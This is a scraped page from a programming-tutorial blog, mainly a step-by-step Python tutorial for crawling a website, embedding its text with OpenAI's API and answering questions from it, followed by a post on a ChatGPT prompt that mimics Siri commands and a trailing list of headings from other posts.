crawls a website,
extracts the text from the webpages,
tokenizes the text, and
creates embeddings for each text (quick explanation on “embeddings” below).

It then uses OpenAI’s API to answer questions based on the embeddings of the text.

You will need to create your own API key in case you want to try it yourself.

You should also install the openai library — I’ve written a blog tutorial on this too:

Recommended: How to Install OpenAI in Python?

Scroll down to the whole code section if you want to try it by copy&paste.

Step 1

This section of the code imports the necessary Python libraries for the script, including requests for sending HTTP requests, re for regular expressions, urllib.request for opening URLs, BeautifulSoup for parsing HTML and XML, deque for creating a queue, HTMLParser for parsing HTML, urlparse for parsing URLs, os for interacting with the operating system, pandas for working with dataframes, tiktoken for getting a tokenizer, and openai for creating embeddings and answering questions.

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"])

Step 2

This section of the code defines a function called get_hyperlinks that takes a URL as input, tries to open the URL and read the HTML, and then parses the HTML to get hyperlinks. If the response is not HTML, it returns an empty list.

################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks

Step 3

This section of the code defines a function called get_domain_hyperlinks that takes a domain and a URL as input and returns a list of hyperlinks from the URL that are within the same domain. If the hyperlink is a URL, it checks if it is within the same domain. If the hyperlink is not a URL, it checks if it is a relative link.

################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links))

Step 4

This section of the code defines a function called crawl that takes a URL as input, parses the URL to get the domain, creates a queue to store the URLs to crawl, creates a set to store the URLs that have already been seen (no duplicates), and creates a directory to store the text files. It then continues crawling until the queue is empty, saving the text from each URL to a text file, and getting the hyperlinks from each URL and adding them to the queue.

################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url)

Step 5

This section of the code defines a function called remove_newlines that takes a pandas Series object as input, replaces newlines with spaces, and returns the modified Series.

################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie

Step 6

This section of the code creates a list called texts to store the text files, gets all the text files in the text directory, opens each file, reads the text, omits the first 11 lines and the last 4 lines, replaces -, _, and #update with spaces, and appends the modified text to the list of texts. It then creates a dataframe from the list of texts, sets the text column to be the raw text with the newlines removed, and saves the dataframe as a CSV file.

################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head()

Step 7

This section of the code loads a tokenizer and applies it to the text column of the dataframe to get the number of tokens for each row. It then creates a histogram of the number of tokens per row.

################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist()

Step 8

This section of the code defines a maximum number of tokens, creates a function called split_into_many that takes text and a maximum number of tokens as input and splits the text into chunks of a maximum number of tokens.

It then loops through the dataframe and either adds the text to the list of shortened texts or splits the text into chunks of a maximum number of tokens and adds the chunks to the list of shortened texts.

################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] )

Step 9

This section of the code creates a new dataframe from the list of shortened texts, applies the tokenizer to the text column of the dataframe to get the number of tokens for each row, and creates a histogram of the number of tokens per row.

################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist()

Step 10

Step 10 involves using OpenAI’s language model to embed the text into vectors. This allows the model to analyze the text and make predictions based on its content. The openai.Embedding.create() function is used to create the embeddings, and they are saved in a new column in the DataFrame.

################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head()

Step 11

Step 11 involves loading the embeddings from the DataFrame and converting them to numpy arrays.

################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head()

Step 12

Step 12 includes the create_context() and answer_question() functions that use the embeddings to find the most similar context to a question and then answer it based on that context. These functions leverage OpenAI’s language models and the embeddings created in Step 10 to provide accurate and reliable answers. The create_context() function creates the context based on the question and the embeddings, while the answer_question() function uses the context and question to generate a response using OpenAI’s GPT-3 language model.

################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return ""

Step 13

Step 13 provides an example of using the answer_question() function to answer two different questions. The first question is a simple one, while the second question requires more specific knowledge. This example demonstrates the versatility of the Q&A bot and its ability to answer a wide range of questions.

################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

Putting It All Together

You can check out the whole code project on the GitHub or simply copy and paste it from here:

################################################################################
### Step 1
################################################################################ import requests
import re
import urllib.request
from bs4 import BeautifulSoup
from collections import deque
from html.parser import HTMLParser
from urllib.parse import urlparse
import os
import pandas as pd
import tiktoken
import openai
from openai.embeddings_utils import distances_from_embeddings
import numpy as np
from openai.embeddings_utils import distances_from_embeddings, cosine_similarity # Regex pattern to match a URL
HTTP_URL_PATTERN = r'^http[s]*://.+' # Define root domain to crawl
domain = "openai.com"
full_url = "https://openai.com/" # Create a class to parse the HTML and get the hyperlinks
class HyperlinkParser(HTMLParser): def __init__(self): super().__init__() # Create a list to store the hyperlinks self.hyperlinks = [] # Override the HTMLParser's handle_starttag method to get the hyperlinks def handle_starttag(self, tag, attrs): attrs = dict(attrs) # If the tag is an anchor tag and it has an href attribute, add the href attribute to the list of hyperlinks if tag == "a" and "href" in attrs: self.hyperlinks.append(attrs["href"]) ################################################################################
### Step 2
################################################################################ # Function to get the hyperlinks from a URL
def get_hyperlinks(url): # Try to open the URL and read the HTML try: # Open the URL and read the HTML with urllib.request.urlopen(url) as response: # If the response is not HTML, return an empty list if not response.info().get('Content-Type').startswith("text/html"): return [] # Decode the HTML html = response.read().decode('utf-8') except Exception as e: print(e) return [] # Create the HTML Parser and then Parse the HTML to get hyperlinks parser = HyperlinkParser() parser.feed(html) return parser.hyperlinks ################################################################################
### Step 3
################################################################################ # Function to get the hyperlinks from a URL that are within the same domain
def get_domain_hyperlinks(local_domain, url): clean_links = [] for link in set(get_hyperlinks(url)): clean_link = None # If the link is a URL, check if it is within the same domain if re.search(HTTP_URL_PATTERN, link): # Parse the URL and check if the domain is the same url_obj = urlparse(link) if url_obj.netloc == local_domain: clean_link = link # If the link is not a URL, check if it is a relative link else: if link.startswith("/"): link = link[1:] elif link.startswith("#") or link.startswith("mailto:"): continue clean_link = "https://" + local_domain + "/" + link if clean_link is not None: if clean_link.endswith("/"): clean_link = clean_link[:-1] clean_links.append(clean_link) # Return the list of hyperlinks that are within the same domain return list(set(clean_links)) ################################################################################
### Step 4
################################################################################ def crawl(url): # Parse the URL and get the domain local_domain = urlparse(url).netloc # Create a queue to store the URLs to crawl queue = deque([url]) # Create a set to store the URLs that have already been seen (no duplicates) seen = set([url]) # Create a directory to store the text files if not os.path.exists("text/"): os.mkdir("text/") if not os.path.exists("text/"+local_domain+"/"): os.mkdir("text/" + local_domain + "/") # Create a directory to store the csv files if not os.path.exists("processed"): os.mkdir("processed") # While the queue is not empty, continue crawling while queue: # Get the next URL from the queue url = queue.pop() print(url) # for debugging and to see the progress # Save text from the url to a <url>.txt file with open('text/'+local_domain+'/'+url[8:].replace("/", "_") + ".txt", "w", encoding="UTF-8") as f: # Get the text from the URL using BeautifulSoup soup = BeautifulSoup(requests.get(url).text, "html.parser") # Get the text but remove the tags text = soup.get_text() # If the crawler gets to a page that requires JavaScript, it will stop the crawl if ("You need to enable JavaScript to run this app." in text): print("Unable to parse page " + url + " due to JavaScript being required") # Otherwise, write the text to the file in the text directory f.write(text) # Get the hyperlinks from the URL and add them to the queue for link in get_domain_hyperlinks(local_domain, url): if link not in seen: queue.append(link) seen.add(link) crawl(full_url) ################################################################################
### Step 5
################################################################################ def remove_newlines(serie): serie = serie.str.replace('\n', ' ') serie = serie.str.replace('\\n', ' ') serie = serie.str.replace(' ', ' ') serie = serie.str.replace(' ', ' ') return serie ################################################################################
### Step 6
################################################################################ # Create a list to store the text files
texts=[] # Get all the text files in the text directory
for file in os.listdir("text/" + domain + "/"): # Open the file and read the text with open("text/" + domain + "/" + file, "r", encoding="UTF-8") as f: text = f.read() # Omit the first 11 lines and the last 4 lines, then replace -, _, and #update with spaces. texts.append((file[11:-4].replace('-',' ').replace('_', ' ').replace('#update',''), text)) # Create a dataframe from the list of texts
df = pd.DataFrame(texts, columns = ['fname', 'text']) # Set the text column to be the raw text with the newlines removed
df['text'] = df.fname + ". " + remove_newlines(df.text)
df.to_csv('processed/scraped.csv')
df.head() ################################################################################
### Step 7
################################################################################ # Load the cl100k_base tokenizer which is designed to work with the ada-002 model
tokenizer = tiktoken.get_encoding("cl100k_base") df = pd.read_csv('processed/scraped.csv', index_col=0)
df.columns = ['title', 'text'] # Tokenize the text and save the number of tokens to a new column
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x))) # Visualize the distribution of the number of tokens per row using a histogram
df.n_tokens.hist() ################################################################################
### Step 8
################################################################################ max_tokens = 500 # Function to split the text into chunks of a maximum number of tokens
def split_into_many(text, max_tokens = max_tokens): # Split the text into sentences sentences = text.split('. ') # Get the number of tokens for each sentence n_tokens = [len(tokenizer.encode(" " + sentence)) for sentence in sentences] chunks = [] tokens_so_far = 0 chunk = [] # Loop through the sentences and tokens joined together in a tuple for sentence, token in zip(sentences, n_tokens): # If the number of tokens so far plus the number of tokens in the current sentence is greater # than the max number of tokens, then add the chunk to the list of chunks and reset # the chunk and tokens so far if tokens_so_far + token > max_tokens: chunks.append(". ".join(chunk) + ".") chunk = [] tokens_so_far = 0 # If the number of tokens in the current sentence is greater than the max number of # tokens, go to the next sentence if token > max_tokens: continue # Otherwise, add the sentence to the chunk and add the number of tokens to the total chunk.append(sentence) tokens_so_far += token + 1 return chunks shortened = [] # Loop through the dataframe
for row in df.iterrows(): # If the text is None, go to the next row if row[1]['text'] is None: continue # If the number of tokens is greater than the max number of tokens, split the text into chunks if row[1]['n_tokens'] > max_tokens: shortened += split_into_many(row[1]['text']) # Otherwise, add the text to the list of shortened texts else: shortened.append( row[1]['text'] ) ################################################################################
### Step 9
################################################################################ df = pd.DataFrame(shortened, columns = ['text'])
df['n_tokens'] = df.text.apply(lambda x: len(tokenizer.encode(x)))
df.n_tokens.hist() ################################################################################
### Step 10
################################################################################ # Note that you may run into rate limit issues depending on how many files you try to embed
# Please check out our rate limit guide to learn more on how to handle this: https://platform.openai.com/docs/guides/rate-limits df['embeddings'] = df.text.apply(lambda x: openai.Embedding.create(input=x, engine='text-embedding-ada-002')['data'][0]['embedding'])
df.to_csv('processed/embeddings.csv')
df.head() ################################################################################
### Step 11
################################################################################ df=pd.read_csv('processed/embeddings.csv', index_col=0)
df['embeddings'] = df['embeddings'].apply(eval).apply(np.array) df.head() ################################################################################
### Step 12
################################################################################ def create_context( question, df, max_len=1800, size="ada"
): """ Create a context for a question by finding the most similar context from the dataframe """ # Get the embeddings for the question q_embeddings = openai.Embedding.create(input=question, engine='text-embedding-ada-002')['data'][0]['embedding'] # Get the distances from the embeddings df['distances'] = distances_from_embeddings(q_embeddings, df['embeddings'].values, distance_metric='cosine') returns = [] cur_len = 0 # Sort by distance and add the text to the context until the context is too long for i, row in df.sort_values('distances', ascending=True).iterrows(): # Add the length of the text to the current length cur_len += row['n_tokens'] + 4 # If the context is too long, break if cur_len > max_len: break # Else add it to the text that is being returned returns.append(row["text"]) # Return the context return "\n\n###\n\n".join(returns) def answer_question( df, model="text-davinci-003", question="Am I allowed to publish model outputs to Twitter, without a human review?", max_len=1800, size="ada", debug=False, max_tokens=150, stop_sequence=None
): """ Answer a question based on the most similar context from the dataframe texts """ context = create_context( question, df, max_len=max_len, size=size, ) # If debug, print the raw model response if debug: print("Context:\n" + context) print("\n\n") try: # Create a completions using the questin and context response = openai.Completion.create( prompt=f"Answer the question based on the context below, and if the question can't be answered based on the context, say \"I don't know\"\n\nContext: {context}\n\n---\n\nQuestion: {question}\nAnswer:", temperature=0, max_tokens=max_tokens, top_p=1, frequency_penalty=0, presence_penalty=0, stop=stop_sequence, model=model, ) return response["choices"][0]["text"].strip() except Exception as e: print(e) return "" ################################################################################
### Step 13
################################################################################ print(answer_question(df, question="What day is it?", debug=False)) print(answer_question(df, question="What is our newest embeddings model?"))

How to Run This Code?

This program is a Python script that scrapes text from a website, processes it, and then uses OpenAI’s language models to answer questions based on the scraped text.

All of the following explanations concern the original code project on the GitHub here.

Here’s a step-by-step guide on how to use it:

Install the required packages: The script uses several Python packages, including requests, BeautifulSoup, pandas, and openai. You can install these packages by running pip install -r requirements.txt in the directory where the script is located.
Set the website to scrape: In the script, you can specify the website to scrape by setting the domain and full_url variables in Step 1. The domain variable should be the root domain of the website (e.g., “example.com”), and the full_url variable should be the full URL of the website (e.g., “https://www.example.com/“).
Run the script: You can run the script in a Python environment by executing python script.py in the directory where the script is located.
Wait for the scraping to complete: The script will take some time to scrape the website and save the text files to disk. You can monitor the progress by looking at the console output.
Ask questions: After the scraping is complete, you can use the answer_question function in Step 12 to ask questions based on the scraped text. The function takes in a dataframe containing the scraped text, a question to ask, and several optional parameters. You can modify the question and other parameters to suit your needs.

Note that the script is intended as a demonstration of how to use OpenAI’s language models to answer questions based on scraped text, and may require modification to work with different websites or to answer different types of questions. It also requires an OpenAI API key to use. You can sign up for an API key on the OpenAI website.

What Is an Embedding in This Context?

In natural language processing, an embedding is a way to represent words or phrases as numerical vectors. These vectors capture semantic and contextual information about the words and phrases, and can be used to train machine learning models for various tasks such as text classification, sentiment analysis, and question answering.

In this script, the embeddings are created using OpenAI’s language models, and they are used to encode the text from the scraped web pages into a numerical format that can be analyzed and searched efficiently.

The embeddings are created by feeding the text through OpenAI’s text-embedding-ada-002 engine, which is designed to create high-quality embeddings for a wide variety of text-based applications.

The resulting embeddings are stored in the DataFrame and used to find the most similar context to a question in order to provide accurate and reliable answers.

Recommended: How to Install OpenAI in Python?

If you want to improve your web scraping skills, check out the following course on the Finxter academy:

Posted on March 2, 2023 by — Leave a comment

How I Built a Virtual Assistant like Siri using ChatGPT Prompting (No Code!)

5/5 – (2 votes)

Siri sucks.

I am a Siri user, and Siri fails me more than it performs for me. It doesn’t understand the chain of commands.

Project Idea: Recreate Siri Using ChatGPT

This got me thinking, “What if I can repurpose ChatGPT to work like Siri?”. So before I tell you how the prompt looks like this is what the chatbot can recognise in the most natural form:

Increase volume
Decrease volume
Play movie
Pause or stop the movie
Open an app
Book a movie or movie ticket
Play song
Book a cab
Call someone
Set a reminder
Send a message
Set an alarm
Open a website
Get directions
Check the weather

To trigger these commands, the user needed to begin the instruction with "Hey Nik".

Let me begin by showing you the most complicated instruction it can handle

Prompt First Trial – Not Perfect Yet

Nik: Assume it's sunny. Hey Nik check the weather for me and if it's sunny book a cab to go to the beach, play song california love by 2Pac ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it's sunny. Here are the commands: [WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Nik: Assume it’s sunny. Hey Nik check the weather for me and if it’s sunny book a cab to go to the beach, play song california love by 2Pac

ChatGPT: Hey there! The weather today is sunny. Sure, I can check the weather for you and book a cab to the beach if it’s sunny. Here are the commands:

[WEATHER] [OPENAPP UBER] [PLAYSONG CALIFORNIA LOVE BY 2PAC]

Please note that the cab booking will not be completed as this is a simulated environment.

ChatGPT is not aware of my environment hence I had to tell them that it’s sunny. And then I start with "Hey Nik...". In contrast, Google & Siri cannot handle this.

After a good deal of prompt engineering, I came up with the following prompt that could be used by an app to not only detect user meaning but also respond accordingly — without needing to create a single line of code to accomplish this magic!

ChatGPT truly can be used as the heart of many applications — not just to create them!

Final Prompt

You can copy and paste this prompt in case you want to reuse it to build your own Siri replacement:

Nik: I want you to be an interactive chatbot that responds to predefined instructions. The instructions and their respective commands are: Increase volume: [INCREASEVOLUME] Decrease volume: [DECREASEVOLUME] Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]] Pause or stop the movie: [STOPMOVIE] Open an app [APP NAME]: [OPENAPP [APP NAME]] Book a movie or movie ticket: [OPENAPP BOOKMYSHOW] Play song [song or artist name]: [PLAYSONG [song or artist name]] Book a cab: [OPENAPP UBER] Call someone [NAME]: [CALL [NAME]] Set a reminder [TIME] [REMINDER]: [SETREMINDER [TIME] [REMINDER]] Send a message [NAME] [MESSAGE]: [SENDMESSAGE [NAME] [MESSAGE]] Set an alarm - [SETALARM [time]] Open a website - [OPEN [website name]] Get directions - [DIRECTIONTO [location]] Check the weather - [WEATHER] Here are some conditions to consider: If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command. If the instruction includes the name of an app when using OPENAPP, append it to the command. To trigger these commands, begin the instruction with "Hey Nik". Please note that commands will be in square brackets, with spaces removed except for messages or names. Your response should contain an acknowledgement in English and below it should be the sequence of commands. After you display the commands do not print anything else.

I came up with the following commands on the first attempt

Increase volume: [INCREASE VOLUME]
Decrease volume: [DECREASEVOLUME]
Play movie [MOVIE NAME]: [PLAYMOVIE [MOVIE NAME]]
Pause or stop the movie: [STOPMOVIE]
Open an app [APP NAME]: [OPENAPP [APP NAME]]
Book a movie or movie ticket: [OPENAPP BOOKMYSHOW]
Play song [song or artist name]: [PLAYSONG [song or artist name]]
Book a cab: [OPENAPP UBER]

After I perfected the results, I wanted to see if ChatGPT could add more commands, so I tried the following prompt

Refinement Prompt

Nik: Can you add more commands in the style given to the prompt. Take inspiration from "ok google" and "hey siri" Please write in English language. ChatGPT: Sure, I can add more commands in the style given to the prompt! Here are some additional commands you can use: To set a reminder, say "Hey Nik, set a reminder for [time] to [task]". For example, "Hey Nik, set a reminder for 2pm to attend a meeting". To check the weather, say "Hey Nik, what's the weather like today?". To get directions, say "Hey Nik, how do I get to [location]?". For example, "Hey Nik, how do I get to Central Park?". To set an alarm, say "Hey Nik, set an alarm for [time]". For example, "Hey Nik, set an alarm for 7am". To send a message, say "Hey Nik, send a message to [contact name]". You will then be prompted to dictate the message and confirm before sending. To open a website, say "Hey Nik, open [website name]". For example, "Hey Nik, open Google". Remember to begin each command with "Hey Nik" for the chatbot to respond. I hope these additional commands are helpful! Nik:Ok now generate the original prompt with the newly added commands Please write in English language.

My Personal Considerations and Findings Using This Prompt

I am impressed with ChatGPT’s ability to generate a more user-friendly and straightforward set of commands. And it also kept modifying my original prompt to include these commands.

But, I realized that there were some conditions that I needed to consider, such as:

If the instruction includes a number or percentage when using INCREASEVOLUME or DECREASEVOLUME, append it to the command.
If the instruction includes the name of an app when using OPENAPP, append it to the command.

With these conditions in mind, I combined the original set of commands with the new commands generated by ChatGPT and added the necessary conditions to create a more comprehensive and user-friendly prompt.

As I developed the chatbot, I discovered that one of its most significant advantages over Siri was its ability to handle an unlimited set of inputs. Siri, on the other hand, works with one command at a time, which can be limiting for users who want to execute multiple tasks in one go.

Here are some examples of user inputs and their respective responses:

User Input: Hey Nik, play movie The Shawshank Redemption Response: [PLAYMOVIE The Shawshank Redemption] User Input: Hey Nik, increase volume by 50 percent Response: [INCREASEVOLUME 50 percent]

User Input: Hey Nik, send a message to John saying I will be there in 10 minutes  Response: [SENDMESSAGE John I will be there in 10 minutes] User Input: Hey Nik, what is the weather like in New York? Response: [WEATHER New York]

Here is an example of the user input and response for the “play song” command:

User input: Hey Nik, play song Shape of You by Ed Sheeran Response: Playing Shape of You by Ed Sheeran Command: [PLAYSONG Shape of You by Ed Sheeran]

And here is an example of the user input and response for the "open an app" command:

User input: Hey Nik, open app Netflix Response: Opening Netflix Command: [OPEN APP NETFLIX]

How to Deploy This

To deploy it as an app, you can use the ChatGPT API + Promptable + Any No Code App Builder, the app can be deployed on iPhone, but there are many permissions that need to be worked out.

A similar version of this may work on Android as it is more open.

How to Install Django on Windows?

How to Install Django on Mac?

How to Install Django on Linux?

How to Install Django on Ubuntu?

How to Install Django in PyCharm?

How to Install Django in Anaconda?

How to Install Django in VSCode?

More Finxter Tutorials

Programmer Humor

Step 1: Install the OpenAI Python Library

Step 2: Create an OpenAI API Key

Step 3: Authenticate with OpenAI API Key

Step 4: Generate Your DALL·E Image

Conclusion

Scopes Overview

Global Scope

Contract Scope

Function Scope

C99 Scoping Rules

Shadowing

Conclusion

What’s Next?

Database Code

Database Functions

Generate Password Hash

User Functions

Reset User Password

Create User

Some Coding Thoughts and Learnings

Participate in Building the Decentralized Social Brain Network

Life Forces #1 – Survival, Enjoyment of Life, Life Extension

Life Forces #2 – Comfortable Living Conditions

Life Forces #3 – To Be Superior and Winning

Life Forces #4 – Sexual Companionship

Life Forces #5 – Freedom From Fear, Pain, and Danger

Life Forces #6 – Care And Protection of Loved Ones

Life Forces #7 – Social Approval

Conclusion

CHALLENGE OVERVIEW

BACKGROUND

ENUMERATION/RECON

STEP 1

STEP 2

STEP 3

STEP 4

STEP 5

STEP 6

STEP 7

INITIAL FOOTHOLD

LOCAL RECON

LOCATE THE SECOND FLAG

CHECK SUDO PERMISSIONS

EXPLOIT/PRIVILEGE ESCALATION

GRAB THE THIRD FLAG

POST-EXPLOITATION – BREAK OUT OF THE DOCKER CONTAINER

FINAL THOUGHTS

Problem Formulation

Method 1: Using Notepad

Method 2: Pure CMD Approach

Method 3: Change File Purely In CMD (Copy Con)

Method 4: If you SSH’d to a Unix Machine

Summary

Overview

Step 1

Step 2

Step 3

Step 4

Step 5

Step 6

Step 7

Step 8

Step 9

Step 10

Step 11

Step 12

Step 13

Putting It All Together

How to Run This Code?

What Is an Embedding in This Context?

Project Idea: Recreate Siri Using ChatGPT